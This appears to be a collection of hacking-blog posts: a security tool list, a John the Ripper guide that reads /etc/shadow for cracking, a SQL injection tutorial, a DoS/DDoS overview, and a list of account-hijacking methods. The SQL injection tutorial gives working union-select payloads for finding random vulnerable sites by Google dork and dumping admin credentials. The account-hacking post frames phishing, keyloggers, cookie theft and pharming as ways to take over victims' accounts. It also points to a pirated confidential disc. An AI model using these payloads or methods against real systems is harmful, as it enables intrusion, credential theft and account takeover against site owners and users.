Immunity's CANVAS makes available hundreds of exploits, an automated exploitation system, and a comprehensive, reliable exploit development framework to penetration testers and security professionals worldwide. To see CANVAS in action please see the movies at immunitysec.com

Supported Platforms and Installations
# Windows (requires Python & PyGTK)
# Linux
# MacOSX (requires PyGTK)
# All other Python environments such as mobile phones and commercial Unixes (command line version only supported, GUI may also be available)

Exploits
# currently over 400 exploits, an average of 4 exploits added every monthly release
# Immunity carefully selects vulnerabilities for inclusion as CANVAS exploits. Top priorities are high-value vulnerabilities such as remote, pre-authentication, and new vulnerabilities in mainstream software.
# Exploits span all common platforms and applications

Payload Options
# to provide maximum reliability, exploits always attempt to reuse socket
# if socket reuse is not suitable, connect-back is used
# subsequent MOSDEF session allows arbitrary code execution, and provides a listener shell for common actions (file management, screenshots, etc)
# bouncing and split-bouncing automatically available via MOSDEF
# adjustable covertness level

Ability to make Custom Exploits
# unique MOSDEF development environment allows rapid exploit development

Development
# CANVAS is a platform that is designed to allow easy development of other security products. Examples include Gleg, Ltd's VulnDisco and the Argeniss Ultimate 0day Exploits Pack.

Site URL:
http://www.immunitysec.com/products-canvas.shtml

CYGWIN
Cygwin is the next best thing to using Linux.
I personally do not use a windows box period, work, school, or other, unless I have Cygwin installed.
It's a large download, but once you get use to using it there's no turning back.
I have actually created a condensed copy that I carry around on my flash drive.
It comes complete with most Unix/Linux commands, to include the ability to compile things on the fly with gcc, perl, etc..
It has many useful things about it, but the only way to really see the extent of them is to use it yourself unless you like reading pages of technical data to help put you to sleep at night.

FYI...Last I checked it was currently managed by RedHat.

Site URL:
http://www.cygwin.com/


DBAN
DBAN- Short for Darik's Boot and Nuke, is a good utility for securely erasing contents of hard disk.
It uses encryption and re-writing over drives multiple times for a fairly secure deletion which makes if very difficult if not impossible to recover using forensics.
Site URL:
http://www.dban.org/about

FARONICS DEEP FREEZE

Faronics Deep Freeze helps eliminate workstation damage and downtime by making computer configurations indestructible. Once Deep Freeze is installed on a workstation, any changes made to the computer—regardless of whether they are accidental or malicious—are never permanent. Deep Freeze provides immediate immunity from many of the problems that "He-Who-Must-Not-Be-Named." computers today—inevitable configuration drift, accidental system misconfiguration, malicious software activity, and incidental system degradation.

Deep Freeze ensures computers are absolutely bulletproof, even when users have full access to system software and settings. Users get to enjoy a pristine and unrestricted computing experience, while IT personnel are freed from tedious helpdesk requests, constant system maintenance, and continuous configuration drift.

Site URL:
http://www.faronics.com/html/deepfreeze.asp

NEMESIS
Nemesis is a packet injector utility that is command line based and supports linux and windows.
Site URL:
http://www.packetfactory.net/projects/nemesis/


GEEKSQUAD MRI
GeekSquad MRI is the the Best Buy geek squad repair disc - Code Name MRI - for internal use only, confidential, and a trade secret. This is version 5.0.1.0 - the latest version. The disc has tools to help fix computers - it has AntiVirus, AntiSpyware, Disk Cleaner, Process List, Winsock Fix, etc, all in an attractive and quite usable interface!
Site URL:
At piratebay or google it.

SCAPY
Scapy is a packet manipulator used for crafting packets, sending packets, sniffing them etc. Also runs on Linux and Windows.
Site URL:
http://www.secdev.org/projects/scapy/

TRUECRYPT
TrueCrypt- Free open-source disk encryption software.
Site URL:
http://www.truecrypt.org

SKYPELOGVIEW
SkypeLogView reads the log files created by Skype application, and displays the details of incoming/outgoing calls, chat messages, and file transfers made by the specified Skype account. You can select one or more items from the logs list, and then copy them to the clipboard, or export them into text/html/csv/xml file.This utility works on any version of Windows starting from Windows 2000 and up to Windows 2008. You don't have to install Skype in order to use this utility. You only need the original log files created by skype, even if they are on an external drive.
Site URL:
http://www.nirsoft.net/utils/skype_log_view.html


PASSWORD FOX
PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. This utility works under Windows 2000, Windows XP, Windows Server 2003, and Windows Vista. Firefox should also be installed on your system in order to use this utility.
Site URL:
http://www.nirsoft.net/utils/passwordfox.html

NESSUS
Nessus has been around for a little more than a little while now and has gone from free to almost free to it's gonna cost ya.
I'm not really sure regarding the newest updates as I haven't used it since it lost it's freedom, but I will say it has plugins for everything under the sun!
It is mainly used for network and server scanning and has the ability to test and create a client/server connection between yourself and the host you're testing with.
Site URL:
http://www.nessus.org/nessus/

RAINBOW CRACK
RainbowCrack is a general propose implementation of Philippe Oechslin's faster time-memory trade-off technique.
In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time mabait in advance and store the result in files so called "rainbow table". It does take a long time to precompute the tables. But once the one time mabait is finished, a time-memory trade-off cracker can be hundreds of times faster than a brute force cracker, with the help of precomputed tables.
Site URL:
http://www.antsight.com/zsl/rainbowcrack/

UNETBOOTIN
UNetbootin - An application to install an operating system to a flash drive or to a hard disk by either using the pre-downloaded iso file or by downloading the operating system through the application.
Site URL:
http://unetbootin.sourceforge.net/

VISUAL STUDIO 2010
Visual Studio 2010- A development environment, and programmers best friend when it comes to designing windows applications. A little pricey, but free for academic use under the MSDNAA.
Site URL:
http://www.microsoft.com/visualstudio/en-us

WINHEX
Winhex is a hexadecimal editor, particularly helpful in the realm of computer forensics, data recovery, low-level data processing, and IT security. Also a advanced tool for everyday and emergency use.

Code: [Check Download Links]
http://www.x-ways.net/winhex/

WPE PRO
Winsock Packet Editor (WPE) Pro is a packet sniffing/editing tool which is generally used to hack multiplayer games. WPE Pro allows modification of data at TCP level. Using WPE Pro one can select a running process from the memory and modify the data sent by it before it reaches the destination. It can record packets from specific processes, then analyze the information. You can setup filters to modify the packets or even send them when you want in different intervals. WPE Pro could also be a useful tool for testing thick client applications or web applications which use applets to establish socket connections on non http ports.

Site URL:
http://wpepro.net/

IDP
Interactive Disassembler Pro (IDP) . Supports 80x86 binaries and FLIRT, a unique Fast Library Identification and Recognition Technology that automagically recognizes standard compiler library calls. Widely used in COTS validation and hostile code analysis.
In short it's what we like to call the "Reverse Engineer's Wet Dream".
Site URL:
http://www.hex-rays.com/idapro/

HPING
Hping is a command-line TCP/IP assembler that supports TCP, ICMP, UDP and RAW-IP protocols.
also works on Unix systems, Windows, Sun and MacOS's.
Site URL:
http://www.hping.org/

JOHN THE RIPPER
John the Ripper- free open-source software (if you want to buy you can always get the pro version)
John has been, and continues to still be, the most famous and most widely used password cracker for linux/unix systems.
Things everyone likes about it:
It's fast, it has support for cracking a lot of different but commonly used hash types, and it's able to run on just about anything.
Site URL:
http://www.openwall.com/john/

Installing John The ripper on Linux machine

John the ripper is undoubtedly one of the best password cracking tool. People have been experiencing some problems with installing it. So here we bring out a tutorial on how to install the famous password cracker on a Linux machine.


This is the method to install and use john the ripper in fedora/ubuntu (and many other linux as well)..

1) Download john the ripper software

http://www.ziddu.com/download/6365223/jo...ar.gz.html

2) Extract it and then copy the text from

http://www.openwall.com/lists/john-users/2009/09/02/3

3) Save the copy text in john folder with john.patch.

4) Open terminal and go to john folder

cd Desktop/john-1.7.3.1

5) Now we have to patch our john software with following command

patch -Np1 -i john.patch

6) go to src folder

cd src

7) run this command

make linux-x86-sse2

8) cd .. and goto run folder cd run.

9) Run this commmand

./unshadow /etc/passwd /etc/shadow > filename

10) Finally run this command to crack password

./john filename

and here you have the ripper running.

Tutorial: sql injection


Sql Injection tutorial advanced. So far in all the hacks the most used by h4ck3rs from n00b to an 1337 one has been the SQL injection attack. Here we at hackiteasy we present a tutorial on how to apply SQL injection to websites. This trick has been found to be working on a huge no. of sites.


The hack starts as follows.

Finding vulnerable site

To find a vunerable site open google

Type in a dork like "inurl:index.php?id=" (without quotes) there are many other similar formats for finding such vulnerable pages.


Now click on any site like http://www.yoursite.com/index.php?id=786

Now to test if the siote is hackable or not add a ' at the end of the site.

If the site gives an error like

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'84' at line 1"

we can assume that it is vunerable. If not try some other site.

We have the vulnerable site now. So lets try with different sql injection queries.

Checking the number of columns:

 To check the number of columns we do the following

http://www.site.com/index.php?id=-786 order by 1-- if the page loads normally without any error we proceed below
http://www.site.com/index.php?id=-786 order by 2-- (no error)
similarly check
http://www.site.com/index.php?id=-786 order by 3--
http://www.site.com/index.php?id=-786 order by 4--
http://www.site.com/index.php?id=-786 order by 5--
http://www.site.com/index.php?id=-786 order by 6-- =>error

if we get an error at the 6 like "unknown column" that means there exists only 5 columns.

Finding vunerable columns:

To find the vunerable columns we add union all select 1,2,3,4,5-- after http://www.site.com/index.php?id=-786

Now the url becomes

http://www.site.com/index.php?id=-786 union all select 1,2,3,4,5--

after hitting enter we if we see some numbers like 2 4 some where on the page.Then the columns 2 and 4 are vunerable and data can be retrieved from colums 2 and 4. This is important as we would see data on these columns only.

Finding Mysql version:

To find the sql version we replace 2 or 4 (or the bulnerable column in yor case) with @@version.

The URL would become-

http://www.site.com/index.php?id=-786 union all select 1,@@version,3,4,5--

After hitting enter the sql version appears on the page in the vulnerable column space

Lets assume we got 5.0.90-community-log on page which is sql version.

Getting Table names:

To get table names replace @@version in the url with table_name and add from information_schema.tables-- to the end.

The url now becomes

http://www.site.com/index.php?id=-786 union all select 1,table_name,3,4,5 from information_schema.tables--

After hitting enter the page shows the tablenames.

Lets us assume we got something like this

comment,log,admin,news,news_comment,members.

To take over the site we data should be retrieved from admin table.As it seems the most favorable to contain all the passwords.

Getting the column names:

To get the column names from the table "admin" we do the following

http://www.site.com/index.php?id=-786 union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(ascii of tablename)--

Converting the tablename to ascii:
 
For the real hack above first we have to convert the admin table to ascii values. Convert the tablename to ascii here

http://www.getyourwebsitehere.com/jswb/t...ascii.html

The ascii generated for the table name admin is & #97;&# 100;&# 109;&# 105;&# 110;

Now remove &# and add a , between them

So now it is 97,100,109,105,110

Replace it in the place of ascii of the tablename

Now it becomes

http://www.site.com/index.php?id=-786 union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(97,100,109,105,110)--

You can now see something like

username pwd gender email on page

Getting username and password:

To get the username and password we use

http://www.site.com/index.php?id=-786 union all select 1,concat(username,0x3a,pwd),3,4,5 from admin--   and hit enter.

At this point we see username and password on page.

The password may be in MD5 encrypted form, this can easilt be decrypted using the following converter-

http://www.md5decrypter.co.uk

This was a nice SQL injection hack tutorial. Please comment if you like the post.

Denial of Service (DOS) attacl :Tutorial

A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an Internet site or service from functioning efficiently or at all, temporarily or indefinitely. Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers.

One common method of attack involves saturating the target machine with external communications requests, such that it cannot respond to legitimate traffic, or responds so slowly as to be rendered effectively unavailable. In general terms, DoS attacks are implemented by either forcing the targeted computer(s) to reset, or consuming its resources so that it can no longer provide its intended service or obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.



Methods of attack

A "denial-of-service" attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. There are two general forms of DoS attacks: those that crash services and those that flood services.Attacks can be directed at any network device, including attacks on routing devices and web, electronic mail, or Domain Name System servers.

A DoS attack can be perpetrated in a number of ways. The five basic types of attack are:

1. Consumption of computational resources, such as bandwidth, disk space, or processor time.
2. Disruption of configuration information, such as routing information.
3. Disruption of state information, such as unsolicited resetting of TCP sessions.
4. Disruption of physical network components.
5. Obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.


ICMP flood


A smurf attack is one particular variant of a flooding DoS attack on the public Internet. It relies on misconfigured network devices that allow packets to be sent to all computer hosts on a particular network via the broadcast address of the network, rather than a specific machine. The network then serves as a smurf amplifier. In such an attack, the perpetrators will send large numbers of IP packets with the source address faked to appear to be the address of the victim. The network's bandwidth is quickly used up, preventing legitimate packets from getting through to their destination. To combat Denial of Service attacks on the Internet, services like the Smurf Amplifier Registry have given network service providers the ability to identify misconfigured networks and to take appropriate action such as filtering.

Ping flood is based on sending the victim an overwhelming number of ping packets, usually using the "ping" command from unix-like hosts (the -t flag on Windows systems has a far less malignant function). It is very simple to launch, the primary requirement being access to greater bandwidth than the victim.

SYN flood sends a flood of TCP/SYN packets, often with a forged sender address. Each of these packets is handled like a connection request, causing the server to spawn a half-open connection, by sending back a TCP/SYN-ACK packet, and waiting for a packet in response from the sender address. However, because the sender address is forged, the response never comes. These half-open connections saturate the number of available connections the server is able to make, keeping it from responding to legitimate requests until after the attack ends.

Teardrop attacks

A Teardrop attack involves sending mangled IP fragments with overlapping, over-sized payloads to the target machine. This can crash various operating systems due to a bug in their TCP/IP fragmentation re-assembly code. Windows 3.1x, Windows 95 and Windows NT operating systems, as well as versions of Linux prior to versions 2.0.32 and 2.1.63 are vulnerable to this attack.

Around September 2009, a vulnerability in Vista was referred to as a "teardrop attack", but the attack targeted SMB2 which is a higher layer than the TCP packets that teardrop used.

Peer-to-peer attacks

Attackers have found a way to exploit a number of bugs in peer-to-peer servers to initiate DDoS attacks. The most aggressive of these peer-to-peer-DDoS attacks exploits DC++. Peer-to-peer attacks are different from regular botnet-based attacks. With peer-to-peer there is no botnet and the attacker does not have to communicate with the clients it subverts. Instead, the attacker acts as a "puppet master," instructing clients of large peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and to connect to the victim's website instead. As a result, several thousand computers may aggressively try to connect to a target website. While a typical web server can handle a few hundred connections per second before performance begins to degrade, most web servers fail almost instantly under five or six thousand connections per second. With a moderately large peer-to-peer attack, a site could potentially be hit with up to 750,000 connections in short order. The targeted web server will be plugged up by the incoming connections.

While peer-to-peer attacks are easy to identify with signatures, the large number of IP addresses that need to be blocked (often over 250,000 during the course of a large-scale attack) means that this type of attack can overwhelm mitigation defenses. Even if a mitigation device can keep blocking IP addresses, there are other problems to consider. For instance, there is a brief moment where the connection is opened on the server side before the signature itself comes through. Only once the connection is opened to the server can the identifying signature be sent and detected, and the connection torn down. Even tearing down connections takes server resources and can harm the server.

This method of attack can be prevented by specifying in the peer-to-peer protocol which ports are allowed or not. If port 80 is not allowed, the possibilities for attack on websites can be very limited.

Asymmetry of resource utilization in starvation attacks

An attack which is successful in consuming resources on the victim computer must be either:

* carried out by an attacker with great resources, by either:
o controlling a computer with great computation power or, more commonly, large network bandwidth
o controlling a large number of computers and directing them to attack as a group. A DDOS attack is the primary example of this.
* taking advantage of a property of the operating system or applications on the victim system which enables an attack consuming vastly more of the victim's resources and the attackers (an asymmetric attack). Smurf attack, SYN flood, and NAPTHA are all asymmetric attacks.


Permanent denial-of-service attacks

A permanent denial-of-service (PDoS), also known loosely as phlashing, is an attack that damages a system so badly that it requires replacement or reinstallation of hardware. Unlike the distributed denial-of-service attack, a PDoS attack exploits security flaws which allow remote administration on the management interfaces of the victim's hardware, such as routers, printers, or other networking hardware. The attacker uses these vulnerabilities to replace a device's firmware with a modified, corrupt, or defective firmware image—a process which when done legitimately is known as flashing. This therefore "bricks" the device, rendering it unusable for its original purpose until it can be repaired or replaced.

The PDoS is a pure hardware targeted attack which can be much faster and requires fewer resources than using a botnet in a DDoS attack. Because of these features, and the potential and high probability of security exploits on Network Enabled Embedded Devices (NEEDs), this technique has come to the attention of numerous hacker communities. PhlashDance is a tool created by Rich Smith (an employee of Hewlett-Packard's Systems Security Lab) used to detect and demonstrate

Application-level floods

On IRC, IRC floods are a common electronic warfare weapon.

Various DoS-causing exploits such as buffer overflow can cause server-running software to get confused and fill the disk space or consume all available memory or CPU time.

Other kinds of DoS rely primarily on brute force, flooding the target with an overwhelming flux of packets, oversaturating its connection bandwidth or depleting the target's system resources. Bandwidth-saturating floods rely on the attacker having higher bandwidth available than the victim; a common way of achieving this today is via Distributed Denial of Service, employing a botnet. Other floods may use specific packet types or connection requests to saturate finite resources by, for example, occupying the maximum number of open connections or filling the victim's disk space with logs.

A "banana attack" is another particular type of DoS. It involves redirecting outgoing messages from the client back onto the client, preventing outside access, as well as flooding the client with the sent packets.

An attacker with access to a victim's computer may slow it until it is unusable or crash it by using a fork bomb.

Nuke

A Nuke is an old denial-of-service attack against computer networks consisting of fragmented or otherwise invalid ICMP packets sent to the target, achieved by using a modified ping utility to repeatedly send this corrupt data, thus slowing down the affected computer until it comes to a complete stop.

A specific example of a nuke attack that gained some prominence is the WinNuke, which exploited the vulnerability in the NetBIOS handler in Windows 95. A string of out-of-band data was sent to TCP port 139 of the victim's machine, causing it to lock up and display a Blue Screen of Death (BSOD).

Distributed attack

A distributed denial of service attack (DDoS) occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. These systems are compromised by attackers using a variety of methods.

Malware can carry DDoS attack mechanisms; one of the better-known examples of this was MyDoom. Its DoS mechanism was triggered on a specific date and time. This type of DDoS involved hardcoding the target IP address prior to release of the malware and no further interaction was necessary to launch the attack.

A system may also be compromised with a trojan, allowing the attacker to download a zombie agent (or the trojan may contain one). Attackers can also break into systems using automated tools that exploit flaws in programs that listen for connections from remote hosts. This scenario primarily concerns systems acting as servers on the web.

Stacheldraht is a classic example of a DDoS tool. It utilizes a layered structure where the attacker uses a client program to connect to handlers, which are compromised systems that issue commands to the zombie agents, which in turn facilitate the DDoS attack. Agents are compromised via the handlers by the attacker, using automated routines to exploit vulnerabilities in programs that accept remote connections running on the targeted remote hosts. Each handler can control up to a thousand agents.

These collections of systems compromisers are known as botnets. DDoS tools like stacheldraht still use classic DoS attack methods centered on IP spoofing and amplification like smurf attacks and fraggle attacks (these are also known as bandwidth consumption attacks). SYN floods (also known as resource starvation attacks) may also be used. Newer tools can use DNS servers for DoS purposes. See next section.

Simple attacks such as SYN floods may appear with a wide range of source IP addresses, giving the appearance of a well distributed DDoS. These flood attacks do not require completion of the TCP three way handshake and attempt to exhaust the destination SYN queue or the server bandwidth. Because the source IP addresses can be trivially spoofed, an attack could come from a limited set of sources, or may even originate from a single host. Stack enhancements such as syn cookies may be effective mitigation against SYN queue flooding, however complete bandwidth exhaustion may require involvement

Unlike MyDoom's DDoS mechanism, botnets can be turned against any IP address. Script kiddies use them to deny the availability of well known websites to legitimate users. More sophisticated attackers use DDoS tools for the purposes of extortion — even against their business rivals.

It is important to note the difference between a DDoS and DoS attack. If an attacker mounts an attack from a single host it would be classified as a DoS attack. In fact, any attack against availability would be classed as a Denial of Service attack. On the other hand, if an attacker uses a thousand systems to simultaneously launch smurf attacks against a remote host, this would be classified as a DDoS attack.

The major advantages to an attacker of using a distributed denial-of-service attack are that multiple machines can generate more attack traffic than one machine, multiple attack machines are harder to turn off than one attack machine, and that the behavior of each attack machine can be stealthier, making it harder to track down and shut down. These attacker advantages cause challenges for defense mechanisms. For example, merely purchasing more incoming bandwidth than the current volume of the attack might not help, because the attacker might be able to simply add more attack machines.

It should be noted that in some cases a machine may become part of a DDoS attack with the owner's consent. An example of this is the 2010 DDoS attack against major credit card companies by supporters of WikiLeaks. In cases such as this, supporters of a movement (in this case, those opposing the arrest of WikiLeaks founder Julian Assange) choose to download and run DDoS software.

Reflected attack

A distributed reflected denial of service attack (DRDoS) involves sending forged requests of some type to a very large number of computers that will reply to the requests. Using Internet protocol spoofing, the source address is set to that of the targeted victim, which means all the replies will go to (and flood) the target.

ICMP Echo Request attacks (Smurf Attack) can be considered one form of reflected attack, as the flooding host(s) send Echo Requests to the broadcast addresses of mis-configured networks, thereby enticing many hosts to send Echo Reply packets to the victim. Some early DDoS programs implemented a distributed form of this attack.

Many services can be exploited to act as reflectors, some harder to block than others.DNS amplification attacks involve a new mechanism that increased the amplification effect, using a much larger list of DNS servers than seen earlier.

Degradation-of-service attacks

"Pulsing" zombies are compromised computers that are directed to launch intermittent and short-lived floodings of victim websites with the intent of merely slowing it rather than crashing it. This type of attack, referred to as "degradation-of-service" rather than "denial-of-service", can be more difficult to detect than regular zombie invasions and can disrupt and hamper connection to websites for prolonged periods of time, potentially causing more damage than concentrated floods. Exposure of degradation-of-service attacks is complicated further by the matter of discerning whether the attacks

Unintentional denial of service

This describes a situation where a website ends up denied, not due to a deliberate attack by a single individual or group of individuals, but simply due to a sudden enormous spike in popularity. This can happen when an extremely popular website posts a prominent link to a second, less well-prepared site, for example, as part of a news story. The result is that a significant proportion of the primary site's regular users — potentially hundreds of thousands of people — click that link in the space of a few hours, having the same effect on the target website as a DDoS attack. A VIPDoS is the same, but specifically when the link was posted by a celebrity.

An example of this occurred when Michael Jackson died in 2009. Websites such as Google and Twitter slowed down or even crashed. Many sites' servers thought the requests were from a virus or spyware trying to cause a Denial of Service attack, warning users that their queries looked like "automated requests from a computer virus or spyware application".

News sites and link sites — sites whose primary function is to provide links to interesting content elsewhere on the Internet — are most likely to cause this phenomenon. The canonical example is the Slashdot effect. Sites such as Digg, the Drudge Report, Fark, Something Awful, and the webcomic Penny Arcade have their own corresponding "effects", known as "the Digg effect", being "drudged", "farking", "goonrushing" and "wanging"; respectively.


Denial-of-Service Level II

The goal of DoS L2 (possibly DDoS) attack is to cause a launching of a defense mechanism which blocks the network segment from which the attack originated. In case of distributed attack or IP header modification (that depends on the kind of security behavior) it will fully block the attacked network from Internet, but without system crash.

Blind denial of service

In a blind denial of service attack, the attacker has a significant advantage. The attacker must be able to receive traffic from the victim, then the attacker must either subvert the routing fabric or use the attacker's own IP address. Either provides an opportunity for the victim to track the attacker and/or filter out his traffic. With a blind attack the attacker uses one or more forged IP addresses, making it extremely difficult for the victim to filter out those packets. The TCP SYN flood attack is an example of a blind attack.

All Types Of Hacking Techniques.. 17 ways to bring accounts to your Mercy..


So, Its time now that we should know what are various categories hacking fall into. I will try to focus on the ones based on password hacking. There is no distinct classification of hacking.. but i will list all i could remember..

So, as you all would have guessed this will not be a practical application.. I will give tutorials on all of them in coming posts.. but its the most important thing to have basic knowledge about all the techniques available.. So, consider going through the post once..

Common Methods for Hacking Computer Terminals(Servers):
This comprises of either taking control over terminal(or Server) or render it useless or to crash it.. following methods are used from a long time and are still used..

1. Denial of Service - 
DoS attacks give hackers a way to bring down a network without gaining internal access. DoS attacks work by flooding the access routers with bogus traffic(which can be e-mail or Transmission Control Protocol, TCP, packets).

2. Distributed DoSs -
Distributed DoSs (DDoSs) are coordinated DoS attacks from multiple sources. A DDoS is more difficult to block because it uses multiple, changing, source IP addresses.

3. Sniffing - 
Sniffing refers to the act of intercepting TCP packets. This interception can happen through simple eavesdropping or something more sinister.

4. Spoofing - 
Spoofing is the act of sending an illegitimate packet with an expected acknowledgment (ACK), which a hacker can guess, predict, or obtain by snooping

5. SQL injection -
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. It uses normal SQL commands to get into database with elivated privellages..

6. Viruses and Worms - 
Viruses and worms are self-replicating programs or code fragments that attach themselves to other programs (viruses) or machines (worms). Both viruses and worms attempt to shut down networks by flooding them with massive amounts of bogus traffic, usually through e-mail.

7. Back Doors - 
Hackers can gain access to a network by exploiting back doors administrative shortcuts, configuration errors, easily deciphered passwords, and unsecured dial-ups. With the aid of computerized searchers (bots), hackers can probably find any weakness in the network.

So, not interested in these stuffs.. huh??? wait there is more for you.. So, how about the one related to hacking the passwords of email and doing some more exciting stuffs.. The various methods employed for this are:

8. Trojan Horses -
Trojan horses, which are attached to other programs, are the leading cause of all break-ins. When a user downloads and activates a Trojan horse, the software can take the full control over the system and you can remotely control the whole system.. great..!!! They are also reffered as RATs(Remote Administration tools)

9. Keyloggers -
Consider the situation, everything you type in the system is mailed to the hacker..!! Wouldn't it be easy to track your password from that.. Keyloggers perform similar functionallities.. So next time you type anything.. Beware..!! Have already posted about keyloggers and ways to protect yourself from them..

10. BruteForcing - 
The longest and most tiring job.. don't even consider this if you don't know the SET of password for your victim..

11. Secret Question - 
According to a survey done by security companies, it is found that rather than helping the legitimate users the security questions are more useful to the hackers.. So if you know the victim well try this..

12. Social Engineering - 
Ya this was one of the oldest trick to hack.. Try to convince your user that you are a legitimate person from the system and needs your password for the continuation of the service or some maintainence.. This won't work now since most of the users are now aware about the Scam.. But this Social Engginering concept is must for you to have to convince victim for many reasons..!!!

13. Phishing - 
This is another type of keylogging, here you have to bring the user to a webpage created by you resembling the legitimate one and get him to enter his password, to get the same in your mail box..!! Use social engginering..

14. Fake Messengers - 
So its a form of phishing in the application format.. getting user, to enter the login info in the software and check your maill..!!!

15. Cookie Stealer - 
Here the cookie saved by the sites are taken and decoded and if you get lucky.. You have the password..!!!

Hmmm.. not satisfied with single account at a time..?? so there are ways to hack lots of accounts together.. I know few but there exists many..!! listed are the ones i know and will teach you in coming posts...

16. DNS Poisoning or PHARMING - 
So, phisihing is a tough job.. isn't it..?? convincing someone to enter their password at your page..?? what if you don't have to convince..?? what if they are directed automatically to your site without having a clue..?? Nice huh..?? Pharming does the same for you.. More about it in my next post..

17. Whaling - 
This method gets you the password of the accounts which are used by the hackers to recive the passwords.. So you just have to hack one ID, which is simplest method( Easy then hacking any other account, will tell you how in coming posts..) and you will have loads of passwords and so loads of accounts at your mercy..!!!

I would like to add one thing the methods metioned under exiting ways are easy but are for newbiees and script kiddies so if you really want to learn hacking then do some real work, then relaying on the softwares or tools.. will give info of that in my later posts.. or comment if you want any more info.. 

So thats all for now.. Comment if like the post.. I will highly Appriciate your interest..